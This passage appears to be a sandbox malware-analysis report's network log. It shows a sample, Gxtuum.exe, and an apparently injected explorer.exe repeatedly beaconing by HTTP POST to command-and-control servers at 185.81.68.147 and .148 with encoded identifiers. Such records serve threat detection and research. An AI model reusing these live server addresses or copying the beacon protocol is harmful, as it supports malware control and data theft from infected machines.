                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:49.554466963 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:48 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                118192.168.2.550024185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:48.394035101 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:49.742000103 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:49 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                119192.168.2.550025185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:49.234886885 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:49.354929924 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:50.891608953 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:49 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                120192.168.2.550031185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:51.125825882 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:51.245946884 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:52.560362101 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:51 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                121192.168.2.550032185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:51.451699018 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:52.772864103 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:52 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                122192.168.2.550033185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:51.699517012 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:53.006556034 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:52 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                123192.168.2.550034185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:52.803030014 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:52.923086882 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:54.263041973 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:53 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                124192.168.2.550040185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:54.500850916 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:54.620675087 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:55.966187000 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:55 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                125192.168.2.550041185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:54.535326958 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:55.885842085 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:55 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                126192.168.2.550042185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:54.662138939 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:56.023236036 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:55 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                127192.168.2.550048185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:56.204641104 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:56.324753046 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:57.650346994 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:56 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                128192.168.2.550049185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:57.733798981 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:59.100663900 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:58 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                129192.168.2.550050185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:57.837287903 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:59.178493977 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:58 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                130192.168.2.550051185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:57.875531912 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:57.995436907 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:59.499635935 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:58 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                131192.168.2.550057185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:59.745054007 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:59.864869118 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:01.388092041 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:00 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                132192.168.2.550058185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:00.891752958 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:39:02.226515055 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:01 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                133192.168.2.550059185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:00.891875982 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:39:02.226257086 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:01 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                134192.168.2.550065185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:01.625380039 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:39:01.745424032 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:03.076997995 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:02 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                135192.168.2.550071185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:03.312808990 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:39:03.432771921 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:04.947021008 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:03 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                136192.168.2.550073185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:04.052398920 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:39:05.381978989 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:04 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                137192.168.2.550072185.81.68.14880
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:04.052465916 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:39:05.381890059 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:04 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


